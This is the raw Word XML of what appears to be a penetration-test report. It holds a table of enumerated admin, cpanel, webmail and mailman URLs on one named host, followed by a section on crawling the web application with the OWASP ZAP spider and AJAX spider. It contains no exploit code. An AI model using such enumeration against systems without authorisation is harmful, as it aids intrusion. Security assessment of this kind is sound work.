    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="008C0316" w14:paraId="63399AB7" w14:textId="77777777" w:rsidTr="008C0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4E12F2" w14:textId="43A0F6DE" w:rsidR="008C0316" w:rsidRDefault="008C0316" w:rsidP="008C0316">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>URL Links</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C0316" w14:paraId="4915C76F" w14:textId="77777777" w:rsidTr="008C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F13F4A" w14:textId="641A7A2F" w:rsidR="008C0316" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="008C0316">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId47" w:history="1">
              <w:r w:rsidR="008C0316" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/assets</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C0316" w14:paraId="4432880F" w14:textId="77777777" w:rsidTr="008C0316">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6390C716" w14:textId="66CE51E3" w:rsidR="008C0316" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="008C0316">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId48" w:history="1">
              <w:r w:rsidR="008C0316" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/files</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C0316" w14:paraId="7FEB9F37" w14:textId="77777777" w:rsidTr="008C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9A84F5" w14:textId="14285220" w:rsidR="008C0316" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="008C0316">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId49" w:history="1">
              <w:r w:rsidR="008C0316" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/cpanel</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C0316" w14:paraId="1CCCEC22" w14:textId="77777777" w:rsidTr="008C0316">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D47F69F" w14:textId="69E3553D" w:rsidR="008C0316" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="008C0316">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId50" w:tgtFrame="_blank" w:tooltip="https://hrcms-admin.tri-niche.com/controlpanel" w:history="1">
              <w:r w:rsidR="008C0316" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/controlpanel</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="008C0316" w:rsidRPr="00F835E2">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C0316" w14:paraId="12C3A0B6" w14:textId="77777777" w:rsidTr="008C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8B9AEE" w14:textId="5149E72A" w:rsidR="008C0316" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="008C0316">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId51" w:tgtFrame="_blank" w:tooltip="https://hrcms-admin.tri-niche.com/webmail" w:history="1">
              <w:r w:rsidR="008C0316" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/webmail</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C0316" w14:paraId="73C74650" w14:textId="77777777" w:rsidTr="008C0316">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75F93085" w14:textId="1B362694" w:rsidR="008C0316" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="008C0316">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId52" w:tgtFrame="_blank" w:tooltip="https://hrcms-admin.tri-niche.com/mailman/" w:history="1">
              <w:r w:rsidR="008C0316" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/mailman/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C0316" w14:paraId="7DCAF29B" w14:textId="77777777" w:rsidTr="008C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02D5A4" w14:textId="794879C5" w:rsidR="008C0316" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="008C0316">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId53" w:tgtFrame="_blank" w:tooltip="https://hrcms-admin.tri-niche.com/mailman/admin" w:history="1">
              <w:r w:rsidR="006E2D81" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/mailman/admin</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C0316" w14:paraId="7DCDB05F" w14:textId="77777777" w:rsidTr="008C0316">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F4AA5F6" w14:textId="0069340B" w:rsidR="008C0316" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="008C0316">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId54" w:tgtFrame="_blank" w:tooltip="https://hrcms-admin.tri-niche.com/mailman/listinfo" w:history="1">
              <w:r w:rsidR="006E2D81" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/mailman/listinfo</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C0316" w14:paraId="71AE1465" w14:textId="77777777" w:rsidTr="008C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0F43EF" w14:textId="3931A0BD" w:rsidR="008C0316" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="008C0316">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId55" w:tgtFrame="_blank" w:tooltip="https://hrcms-admin.tri-niche.com/mailman/archives/" w:history="1">
              <w:r w:rsidR="006E2D81" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/mailman/archives/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C0316" w14:paraId="698959B0" w14:textId="77777777" w:rsidTr="008C0316">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EE16FC3" w14:textId="4C4F7AEB" w:rsidR="008C0316" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="004C44DA">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId56" w:tgtFrame="_blank" w:tooltip="https://hrcms-admin.tri-niche.com/mailman/archives/index.html" w:history="1">
              <w:r w:rsidR="00F835E2" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/mailman/archives/index.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F835E2" w14:paraId="1F00F756" w14:textId="77777777" w:rsidTr="008C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22B185" w14:textId="1F10FE91" w:rsidR="00F835E2" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="004C44DA">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId57" w:tgtFrame="_blank" w:tooltip="https://hrcms-admin.tri-niche.com/pipermail/" w:history="1">
              <w:r w:rsidR="00F835E2" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/pipermail/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F835E2" w14:paraId="790D34AE" w14:textId="77777777" w:rsidTr="008C0316">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19AC10CC" w14:textId="1DC47004" w:rsidR="00F835E2" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="004C44DA">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId58" w:tgtFrame="_blank" w:tooltip="https://hrcms-admin.tri-niche.com/pipermail/index.html" w:history="1">
              <w:r w:rsidR="00F835E2" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/pipermail/index.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CC7CF34" w14:textId="77777777" w:rsidR="005F3972" w:rsidRDefault="005F3972" w:rsidP="004C44DA"/>
    <w:p w14:paraId="74ACA90A" w14:textId="77777777" w:rsidR="003E71DB" w:rsidRDefault="003E71DB">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc93487286"/>
      <w:bookmarkStart w:id="41" w:name="_Toc93502861"/>
      <w:bookmarkStart w:id="42" w:name="_Toc93526894"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CC7CFB" w14:textId="4DD4B83C" w:rsidR="00E66815" w:rsidRDefault="00C7213F" w:rsidP="00A87390">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OWASP ZAP</w:t>
      </w:r>
      <w:r w:rsidR="00E66815">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00CE32F0">
        <w:t>Spidering</w:t>
      </w:r>
      <w:r w:rsidR="00E66815">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="4CDA2EB5" w14:textId="31B92DD2" w:rsidR="002E4966" w:rsidRPr="002E4966" w:rsidRDefault="002E4966" w:rsidP="002E4966">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB64A58" w14:textId="33D1C9C6" w:rsidR="00B11A73" w:rsidRDefault="004C4931" w:rsidP="0021361C">
      <w:r w:rsidRPr="004C4931">
        <w:t xml:space="preserve">The spider is a tool that is used to automatically discover new resources (URLs) on </w:t>
      </w:r>
      <w:r>
        <w:t>the web application</w:t>
      </w:r>
      <w:r w:rsidRPr="004C4931">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EE5024">
        <w:t xml:space="preserve"> It starts from a </w:t>
      </w:r>
      <w:r w:rsidR="00383184">
        <w:t>URL which will be known as the seed.</w:t>
      </w:r>
      <w:r w:rsidR="00BE6119">
        <w:t xml:space="preserve"> It then visits all URLs discovered on the </w:t>
      </w:r>
      <w:r w:rsidR="007F79E3">
        <w:t>site by</w:t>
      </w:r>
      <w:r w:rsidRPr="004C4931">
        <w:t xml:space="preserve"> identif</w:t>
      </w:r>
      <w:r w:rsidR="007F79E3">
        <w:t>ying</w:t>
      </w:r>
      <w:r w:rsidRPr="004C4931">
        <w:t xml:space="preserve"> all the hyperlinks </w:t>
      </w:r>
      <w:r w:rsidR="00B752FD">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="004C4931">
        <w:t xml:space="preserve"> the page and adds them to the list of URLs to visit</w:t>
      </w:r>
      <w:r w:rsidR="000C099D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004C4931">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C099D">
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="004C4931">
        <w:t xml:space="preserve"> process continues recursively as long as new resources are found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B1846" w14:textId="2B40AABA" w:rsidR="00961D0F" w:rsidRDefault="00983CC2" w:rsidP="00C04AD3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658253" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C5C6B76" wp14:editId="34DE1375">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3145134</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>265116</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1145512" cy="216040"/>
                <wp:effectExtent l="0" t="0" r="17145" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="18946409" name="Rectangle 18946409"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1145512" cy="216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51668E">
              <v:rect id="Rectangle 18946409" style="position:absolute;margin-left:247.65pt;margin-top:20.9pt;width:90.2pt;height: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AD30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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00961D0F" w:rsidRPr="008730D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AE27A82" wp14:editId="0E98E62B">
            <wp:extent cx="5943600" cy="2115185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="232" name="Picture 2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chat or text message&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2115185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF6176" w14:textId="63E25004" w:rsidR="00E70553" w:rsidRDefault="007D0895" w:rsidP="0021361C">
      <w:r>
        <w:t xml:space="preserve">Since the web application requires the user to authenticate before </w:t>
      </w:r>
      <w:r w:rsidR="00C95304">
        <w:t xml:space="preserve">navigating to the main page, the spidering process </w:t>
      </w:r>
      <w:r w:rsidR="00DA048F">
        <w:t xml:space="preserve">needs </w:t>
      </w:r>
      <w:r w:rsidR="5E850F04">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="000A5B4C">
        <w:t>have a valid session token before starting the scan</w:t>
      </w:r>
      <w:r w:rsidR="00330E4E">
        <w:t xml:space="preserve"> in order to fully discover all the URLs.</w:t>
      </w:r>
      <w:r w:rsidR="00DC7798">
        <w:t xml:space="preserve"> Refer to </w:t>
      </w:r>
      <w:hyperlink w:anchor="_OWASP_ZAP">
        <w:r w:rsidR="00DC7798" w:rsidRPr="2B7306D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix B</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DC7798">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="0092671E">
        <w:t>setting up ZAP with a session cookie.</w:t>
      </w:r>
      <w:r w:rsidR="00BB65FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B6E9D">
        <w:t xml:space="preserve">Also, </w:t>
      </w:r>
      <w:r w:rsidR="0056007D">
        <w:t>two</w:t>
      </w:r>
      <w:r w:rsidR="007465D4">
        <w:t xml:space="preserve"> separate scans are </w:t>
      </w:r>
      <w:r w:rsidR="00DA76AA">
        <w:t>performed,</w:t>
      </w:r>
      <w:r w:rsidR="007465D4">
        <w:t xml:space="preserve"> and the results are compiled as </w:t>
      </w:r>
      <w:r w:rsidR="000645C4">
        <w:t>the output</w:t>
      </w:r>
      <w:r w:rsidR="004D6206">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B442D2">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="004D6206">
        <w:t xml:space="preserve"> user and admin are different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5A0450" w14:textId="40C9DE7E" w:rsidR="00E77D9E" w:rsidRDefault="00EE5BFA" w:rsidP="00F830D3">
      <w:r>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidR="00961D0F">
        <w:t>the output of the spider</w:t>
      </w:r>
      <w:r w:rsidR="00607F05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B442D2">
        <w:t>contained</w:t>
      </w:r>
      <w:r w:rsidR="00607F05">
        <w:t xml:space="preserve"> some false positive results due to the Web Application Firewall. For example, </w:t>
      </w:r>
      <w:r w:rsidR="009728C6">
        <w:t xml:space="preserve">robots.txt was listed </w:t>
      </w:r>
      <w:r w:rsidR="00D704DB">
        <w:t xml:space="preserve">as a discovered link but upon reviewing the response, </w:t>
      </w:r>
      <w:r w:rsidR="00E43B7D">
        <w:t xml:space="preserve">it was </w:t>
      </w:r>
      <w:r w:rsidR="00923690">
        <w:t xml:space="preserve">actually directed to the reCAPTCHA page </w:t>
      </w:r>
      <w:r w:rsidR="0064240F">
        <w:t>as the IP address was blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AEC68B" w14:textId="493348A3" w:rsidR="004277E0" w:rsidRDefault="007D0895" w:rsidP="00FB54E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="082420E4" wp14:editId="6D69E72B">
            <wp:extent cx="5943600" cy="3344545"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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D035384" w14:textId="77777777" w:rsidR="00627A8D" w:rsidRDefault="00627A8D" w:rsidP="00FB54E7"/>
    <w:p w14:paraId="17299F56" w14:textId="39EBF05A" w:rsidR="00E70553" w:rsidRDefault="00F12C0D" w:rsidP="00E77D9E">
      <w:r>
        <w:t>Additionally, AJAX Spider is an add-on integrated with ZAP as a crawler for AJAX sites. This can be used to identify the pages of the web application, when combined with the normal spidering mode, it can produce a more in-depth result.</w:t>
      </w:r>
      <w:r w:rsidR="00D77652" w:rsidRPr="00D77652">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E015D8B" w14:textId="156EA3FF" w:rsidR="00A231BB" w:rsidRDefault="00D77652" w:rsidP="00FB54E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658254" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0947D80C" wp14:editId="48BD7953">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3049458</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1452489</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2437451" cy="232899"/>
                <wp:effectExtent l="0" t="0" r="20320" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="18946411" name="Rectangle 18946411"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2437451" cy="2328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E002AE">
              <v:rect id="Rectangle 18946411" style="position:absolute;margin-left:240.1pt;margin-top:114.35pt;width:191.95pt;height:18.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4B1A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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A231BB" w:rsidRPr="008730D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="509622E9" wp14:editId="5F66D7C8">
            <wp:extent cx="5943600" cy="2331085"/>
            <wp:effectExtent l="0" t="0" r="0" b="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r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2331085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E379BC2" w14:textId="77150F85" w:rsidR="007D0895" w:rsidRDefault="0008579E" w:rsidP="00FB54E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57BB1147" wp14:editId="6C1368B7">
            <wp:extent cx="5943600" cy="3344545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>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B89D82C" w14:textId="77777777" w:rsidR="00B17FFD" w:rsidRDefault="00B17FFD" w:rsidP="00FB54E7"/>
